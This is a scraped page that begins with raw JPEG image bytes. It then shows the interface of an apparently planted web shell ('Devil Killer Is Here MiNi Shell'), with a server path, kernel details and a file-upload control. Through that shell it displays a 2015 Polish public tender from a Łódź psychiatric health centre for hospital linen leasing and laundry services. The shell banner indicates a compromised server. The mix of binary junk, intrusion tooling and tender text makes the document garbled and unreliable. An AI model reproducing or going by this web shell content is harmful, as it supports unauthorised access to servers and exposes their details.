JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150224/24835-N-2015.html

<p class="kh_header"><b>Łódź: Kompleksowa usługa dzierżawy, prania i dystrybucji bielizny oraz pozostałego asortymentu szpitalnego</b><br>
<b>Numer ogłoszenia: 24835 - 2015; data zamieszczenia: 24.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalistyczny Psychiatryczny Zespół Opieki Zdrowotnej , ul. Aleksandrowska 159, 91-229 Łódź, woj. łódzkie, tel. 042 6529639, faks 042 6528620.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.psychiatria-lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa usługa dzierżawy, prania i dystrybucji bielizny oraz pozostałego asortymentu szpitalnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1  Przedmiotem  zamówienia jest kompleksowa usługa dzierżawy , prania i dystrybucji bielizny oraz pozostałego asortymentu szpitalnego zgodnie z zapotrzebowaniem Spec. Psych ZOZ w Łodzi  realizowana poprzez  
1.a. odbiór i pranie brudnej pościeli szpitalnej będącej własnością Zamawiającego
1.b. odbiór i  pranie brudnego  innego asortymentu  własności  pacjentów Zamawiającego
1.c. odbiór i pranie brudnej  pościeli szpitalnej  dzierżawionej od Wykonawcy
1.d. dzierżawę   400 nowych kompletów  bielizny szpitalnej . Na komplet składa się : poszwa o wymiarach 160x200 cm; poszewka o wymiarach 80x80 cm;   prześcieradło z gumką  na materace szpitalne o wymiarach 90x200x15 cm  
1.e. dostawę czystej , wypranej  bielizny i innego asortymentu wymienionego w punktach  1 a, b, c i d do poszczególnych komórek Zamawiającego 
Zamawiający informuje, iż w ramach realizacji przedmiotowej usługi , obsłudze podlega bezpośrednio osiem Pawilonów szpitalnych . Odległość między każdy z Pawilonów wynosi ok. 100-150 m. Wszystkie osiem pawilonów znajduje się w siedzibie Zamawiającego tj. Łódź, ul. Aleksandrowska 159.
Przedmiot umowy- asortyment, dostawa, transport, dokumenty przewozowo-rozliczeniowe, pakowanie i spis bielizny, rozliczenie bielizny i wagi (w tym braki oraz ich uzupełnianie), terminy  realizacji, zwrot dokumentu przewozowo-rozliczeniowego wraz z bielizną - realizowane będą na zasadach określonych w tabeli przedstawionej w Załączniku nr 4 do SIWZ oraz umowie stanowiącej Załącznik nr 3 do SIWZ.
2. Wielkość przedmiotu zamówienia .   
2.1. Przewidywane, szacunkowe ilości  przekazywane do prania w okresie obowiązywania umowy  ( 24 miesięcy)   to: 
2.1.a. ok.  140 000 kg.  pościeli szpitalnej  będącej własnością j Zamawiającego 
2.1 b. ok. 720 kg pozostałego asortymentu 
2.1.c. ok. 7 000  kg bielizny dzierżawionej 
2.1.d. dzierżawa  400 nowych kompletów  bielizny szpitalnej .  Na komplet pościeli składa się : poszwa o wymiarach 160x200 cm; poszewka o wymiarach 80x80 cm;   prześcieradło z gumką o wymiarach  90X200X15 cm  . Ilość dzierżawionych kompletów nie jest   tożsama z szacunkową ilością prania bielizny dzierżawionej. W trakcie trwania całej umowy   dzierżawiona pościel  (komplety) będą wielokrotnie prane. 2.2. Pościel  musi być wykonana z  tkaniny o gramaturze nie mniejszej  niż 170g/m2 , temp. prania 95oC z    możliwością  sterylizacji. 
2.3 . Zamawiający zastrzega możliwość dzierżawy powyżej opisanych  400 kompletów  w zależności od potrzeb Zamawiającego. Przekazanie dzierżawy nie będzie miała  wpływu na znaczne zwiększenie ilości pranej bielizny  będącej własnością Zmawiającego oraz spadek ilości prania bielizny dzierżawionej.  
3 Zakres przedmiot u zamówienia w ramach realizacji usługi obejmuje: 
3.1.Udostępnienie i przekazanie dzierżawionej pościeli szpitalnej :
3.1.a. dzierżawie podlega wyłącznie  komplety  bielizny  pościelowej   (kompl. - poszwa+ poszewka+  prześcieradło)
3.1.b. pościel dzierżawiona musi być wykonana z  tkaniny o gramaturze nie mniejszej  niż 170g/m2 z  możliwością prania w  temp. 95oC i możliwością sterylizacji.	
3.1.c. do 30 dnia kalendarzowego licząc od daty podpisania niniejszej umowy Wykonawca zobowiązany jest  do przygotowania , udostępnienia i  protokolarnego przekazania  Zamawiającemu do używania  I tury dzierżawy w ilości : 200 szt. nowych kompletów pościeli szpitalnej ( tj: 200 szt. poszew wym.  160x200  cm; 200 szt.  poszewek o wym. 80x80 cm; 200 szt. prześcieradeł z gumką o wym. 90x200x15 cm). Przekazanie to nie stanowi przeniesienia na własność Zamawiającego dzierżawionej pościeli.  
3.1.d. po każdym  roku (12 miesiącach) obowiązywania przedmiotowej umowy 200 kompletów bielizny pościelowej szpitalnej będącej przedmiotem dzierżawy, będzie nieodpłatnie, protokolarnie (w formie  pisemnej) przekazane na rzecz Zamawiającego- przekazanie na własność Zamawiającego. 
 3.1.e. przekazanie protokolarne pościeli na własność  Zamawiającego nastąpi dwa razy w ciągu okresu  obowiązywania umowy- pierwsze przekazanie  nastąpi  po upływie 12 miesięcy jednak maksymalnie do upływu 13 miesiąca od dnia podpisania umowy, drugie  przekazanie po 24 miesiącach od podpisania umowy jednak  maksymalnie do upływu 25 miesięcy  od  dnia podpisania umowy).  Z chwilą upływu w.w  okresów - dzierżawiona bielizna przechodzi na własność Zamawiającego. 
3.1.f. każdorazowy,  pisemny protokoły przekazania bielizny potwierdza fakt przeniesienia własności dzierżawionej bielizny w łącznej ilości 400 kompletów bielizny pościelowej szpitalnej. 3.1.g. Zamawiający ponadto wskazuje, iż po okresie 12 miesięcy dzierżawiona bielizna (tj.200 kompl. ) będzie nadal prana u Wykonawcy, ale przy zastosowaniu stawki za usługę prania tak jak dla pościeli własnej  Zamawiającego.  Natomiast po umowy, tj. po 24 miesiącach cała dzierżawiona bielizna będzie własnością Zamawiającego- fakt ten potwierdzony zostanie na podstawie dwóch protokołów  przekazania dzierżawionej pościeli).
3.2. odbiór przez Wykonawcę brudnej bielizny  będącej własnością Zamawiającego ,  bielizny dzierżawionej oraz pozostałego asortymentu z siedziby Zamawiającego, 3.3.  pranie, dezynfekcje, moczenie,, krochmalenie, maglowanie, suszenie, prasowanie bielizny, pościeli  szpitalnej i odzieży pacjentów oraz odzieży ochronnej i roboczej  pracowników 3.4. drobne usługi  szwalnicze (naprawa) oraz ich dostarczanie (zwrot)  po wykonaniu usługi 3.5.  zapewnienie i dostarczenie przez Wykonawcę :
3.5.a. worków o odpowiedniej wytrzymałości niezbędnych do spakowania całości brudnej bielizny
3.5.b.  samo-rozpuszczalnych worków koloru czerwonego  do pakowania bielizny zakaźnej. 
Wszystkie w/w worki  muszą posiadać atest PZH  lub inny równoważny dokument .
3.6. zapewnienia i dostarczenia przez Wykonawcę( §2 ust 8 wzoru umowy):
3.6.a.    na poszczególne Oddziały  23 wózków z podziałem na czystą i brudną  pościel  tj:-   do Pawilonów   III, IV, V, VII, XI - po dwa wózki i stojaki 
-   do Pawilonów   VIII i X po 4 wózki i stojaki;
-  do  Pawilonu nr IX  - 5 wózków i 5 stojaków (z uwzględnieniem  Izbę Przyjęć) 
3.6.b.   na poszczególne Oddziały szpitalne 23 stojaków  
 - do Pawilonów  III, IV, V, VII, XI  po dwa stojaki 
 - do Pawilonów  - VIII i X po 4 stojaki;
 - do  Pawilonu nr IX  - 5 wózków i 5 stojaków  ( z uwzględnieniem  Izbę Przyjęć)
3.6.c.   11 wózków zbiorczych na brudną bieliznę do Pawilonów szpitalnych
W.w wózki i stojaki zostaną zwrócone Wykonawcy po zakończeniu umowy.
4  Pozostałe wymagania:.4.a.Zamawiający wymaga aby Wykonawca świadczył usługę zgodnie z obowiązującymi wymogami sanitarnymi i higienicznymi jakie nakładane są na procesy prania oraz technologie (pralnia posiadająca barierę higieniczną). W tym celu Wykonawca musi dysponować aktualną pozytywną opinią sanitarną Państwowego Powiatowego Inspektora Sanitarnego. Przez pozytywną, aktualną opinię sanitarną Państwowego Powiatowego Inspektora Sanitarnego  -  Zamawiający rozumie aktualną,   pozytywną opinię sanitarną Państwowego Powiatowego Sanitarnego potwierdzająca i wskazującą , że pralnia znajduje się pod nadzorem   właściwego Państwowego Powiatowego Inspektora Sanitarnego, posiada  barierę  higieniczną oraz stan pralni odpowiada warunkom sanitarno - higienicznym.Zamawiający nie będzie respektował opinii -zaświadczenie o spełnieniu przez pralnię  wymagań Rozporządzenia Ministra Zdrowia z dnia 10 listopada 2006 r., (dz. U. 213 poz. 1568) lub też Rozporządzenia Ministra Zdrowia z dnia 2 lutego 2011 r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej - (Dz. U.z 2007 r. Nr 14, poz. 89, z poźn. zm.2). 
 4.b. Technologia prania musi być zgodna z wymogami obowiązującymi w jednostkach ochrony zdrowia (ze szczególnym uwzględnieniem przepisów dotyczących szpitali) oraz spełniać obowiązujące przepisy i standardy prania w zakresie odpowiadającym przedmiotowi  zamówienia;
4.c. Środki piorące i dezynfekujące do realizacji zamówienia  musza być stosowane zgodnie z  zaleceniami producenta, powinny posiadać wymagane obowiązującymi przepisami atesty i  certyfikaty (bez konieczności załączania ich do oferty przetargowej przez Wykonawców)  oraz gwarantować właściwą jakość prania, nie powodującą przyspieszonego zużycia  bielizny;4.d.   Transport bielizny oraz pozostałego asortymentu szpitalnego przekazywanego do pralni musi  być świadczony tylko odpowiednio przygotowanymi środkami transportu spełniającymi 
obowiązujące przepisy i wymagania w zakresie przewożenia bielizny   brudnej i czystej,  dopuszczonym  przez właściwego Inspektora Sanitarnego.  W tym celu Wykonawca musi dysponować aktualną pozytywną opinią sanitarną właściwego Inspektora Sanitarnego . Zamawiający wymaga by środki transportu, które zadeklaruje Wykonawca i będzie używał w ramach realizacji niniejszego zamówienia - posiadały podzieloną skrzynię załadunkową na część czystą i brudną co uniemożliwia stykanie się asortymentu czystego z asortymentem brudnym, przy zachowaniu bariery sanitarnej lub też w przypadku środków transportu, które nie posiadają przedzielonych skrzyni załadunkowych - wymagane jest by Wykonawca zadeklarował odpowiednią ilość środków transportu, które będą użytkowane wyłącznie, rozdzielnie do przewozu bielizny czystej i przewozu bielizny brudnej. Od z Wykonawcy z którym zostanie podpisana umowa , Zamawiający będzie żądał przedłożenia w.w dokumentów.
4.e Wykonawca zobowiązany jest umożliwić Zamawiającemu na jego żądanie wizytację  pralni i procesów  technologicznych, a także środków transportu na każdym etapie  postępowania oraz w każdym czasie  realizowanej usługi (wykonywanej umowy), jeżeli  Zamawiający będzie mieć wątpliwości co do stanu  i 
realnej możliwości wykonania zamówienia publicznego, zgodnie z wymogami SIWZ i złożoną ofertą przetargową.  Zamawiający zastrzega sobie prawo do wykonywania okresowych wymazów ( badań  mikrobiologicznych) z wypranej pościeli  oraz z środków transportu . W przypadku wyników badań  pozytywnych/prawidłowych, koszt badań ponosi Zamawiający. . W przypadku stwierdzenia wyników badań negatywnych , koszt badań ponosi Wykonawca.  Nieprawidłowe  wyniki badań  są podstawą dla Zamawiającego  do nałożenia na Wykonawcę  kar umownych o z godnie z par.8ust 3 projektu  umowy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwości  udzielenia zamówień uzupełniających będących powtórzeniem przedmiotu umowy w zakresie nie większym niż 20% wartości  zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt 6. ustawy Prawo zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6, 98.31.50.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium przed upływem terminu składania ofert w wysokości 7 000,00 PLN.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku warunku, o którym mowa w art. 22 ust. 1 pkt 1 ustawy - Pzp,
Zamawiający nie formułuje szczegółowych wymagań. W tym zakresie Wykonawcę obowiązuje wyłącznie złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, zgodnie z wymogiem określonym w Rozdziale V pkt 1.2 SIWZ.
W przypadku złożenia oferty wspólnej  wymagane jest złożenie dokumentu podpisanego wspólnie przez Wykonawców lub pełnomocnika do reprezentowania Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Zamawiający dokonana oceny spełniania warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów lub oświadczeń wymaganych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku warunku, o którym mowa w art. 22 ust. 1 pkt 2 ustawy - Pzp
Zamawiający dokonana oceny czy Wykonawca posiada wiedzę i doświadczenie związane z przedmiotem zamówienia. Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że wykonał lub wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej dwa zamówienia na usługi prania świadczone na rzecz podmiotów, o których mowa w art. 4 ust. 1 pkt. 2, 3 ustawy o działalności leczniczej z dnia 15.04.2011 r. o wartości każdego z tych zamówień nie mniejszej niż 200.000,00  PLN brutto -na podstawie dokumentu, o którym mowa w Rozdziale VI pkt 6.1.a. SIWZ.Przez usługę odpowiadającą swym charakterem przedmiotowi zamówienia rozumie się usługę polegającą na świadczeniu usługi prania, dezynfekcji i dzierżawy pościeli w szpitalach , trwającą nie krócej niż 6 miesięcy W załączeniu należy zamieścić opinie lub referencje uzyskane od poprzednich zamawiających, które potwierdzają, że usługi te zostały wykonane należycie. W przypadku usług rozpoczętych i w trakcie należy wpisać kwotę faktycznie zrealizowaną wskazanej usługi na dzień otwarcia ofert .Zamawiający dokonana oceny spełniania warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów lub oświadczeń wymaganych w SIWZ.


W przypadku oferty wspólnej przynajmniej jeden z oferentów składających wspólną ofertę musi spełniać wymagany warunek .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku warunków, o których mowa w art. 22 ust. 1 pkt 3 ustawy - Pzp, Zamawiający nie formułuje szczegółowych wymagań. W tym zakresie Wykonawcę obowiązuje wyłącznie złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, zgodnie z wymogiem określonym w Rozdziale V pkt 1.2. SIWZ oraz oświadczenie Wykonawcy , iż posiada aktualną pozytywną opinię sanitarną wydaną przez Państwowego Powiatowego Inspektora Sanitarnego dotyczącą środków transportu dostępnych Wykonawcy i przeznaczonych do realizacji usługi- dla co najmniej 2-óch samochodów. Opinia sanitarna powinna wskazywać czy środki transportu znajdują się pod nadzorem właściwego Państwowego Powiatowego Inspektora Sanitarnego, oraz  stan środków transportu odpowiada warunkom  sanitarno - higienicznym,  na podstawie dokumentu, o którym mowa w Rozdziale III pkt  3.4.d. SIWZ. W przypadku oferty wspólnej przynajmniej jeden ze wspólników musi spełniać wymagany warunek .Zamawiający dokonana oceny spełniania warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów lub oświadczeń wymaganych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowych wymagań. W tym zakresie Wykonawcę obowiązuje wyłącznie złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, zgodnie z wymogiem określonym w Rozdziale V pkt 1.2. SIWZ Zamawiający dokonana oceny spełniania warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów lub oświadczeń wymaganych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku warunku, o którym mowa w art. 22 ust. 1 pkt 4 ustawy - Pzp
Zamawiający nie formułuje szczegółowych wymagań. W tym zakresie Wykonawcę obowiązuje wyłącznie złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, zgodnie z wymogiem określonym w Rozdziale V pkt 1.2.) SIWZ.
W przypadku złożenia oferty wspólnej  wymagane jest złożenie dokumentu podpisanego wspólnie przez Wykonawców lub pełnomocnika do reprezentowania wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Pełnomocnictwo musi być złożone w oryginale lub kopii poświadczonej notarialnie. 
- na podstawie dokumentu, o którym mowa w Rozdziale VI pkt 1.1.b SIWZ.
Zamawiający dokonana oceny spełniania warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów lub oświadczeń wymaganych w SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- w zakresie art. 22 ust 1 pkt 4 - oświadczenie , iż Wykonawca posiada ważną i opłaconą polisę, a w przypadku jej braku inny dokumentu potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia a w przypadku wyboru jego oferty zobowiązuje się do przedłożenia  w/w dokumentu na każde wezwanie Zamawiającego.Dokument powinien potwierdzać spełnianie warunku, którego opis sposobu dokonania oceny  został przedstawiony w Rozdziale V pkt 2.4) SIWZ.
- W przypadku Wykonawców, którzy będą  polegać na zasobie  wiedzy i doświadczeniu z art. 26 2b Ustawy Pzp w Wykonawca zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia  w szczególności przedstawiając  w   tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji w.w zasobów na potrzeby realizacji przedmiotowego zamówienia. Z przedłożonego  dokumentu  z musi w sposób wyraźny i jednoznaczny wynikać zobowiązanie -  wola podmiotu trzeciego  udzielenia wykonawcy, ubiegającemu się o zamówienie zasobu oraz wskazywać
 zakres dostępnych wykonawcy zasobów innego podmiotu, sposób wykorzystania zasobu innego podmiotu, przez wykonawcę przy wykonywaniu zamówienia,
charakter stosunku jaki będzie  łączył wykonawcę z innym podmiotem, zakres i  okresie  udziału podmiotu trzeciego przy wykonywaniu przedmiotowego  zamówienia.          
- oświadczenia Wykonawcy, iż nie zalega z opłacaniem podatków, lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu 
-oświadczenia Wykonawcy, iż nie zalega z opłacaniem składek na ubezpieczenia zdrowotnei społeczne lub, że uzyskał przewidziane prawem zwolnienie,odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu ;
-Załącznik nr 1  SIWZ- Druk OFERTA oraz wymagane w SIWZ dokumenty i oświadczenia oraz  formularze do SIWZ
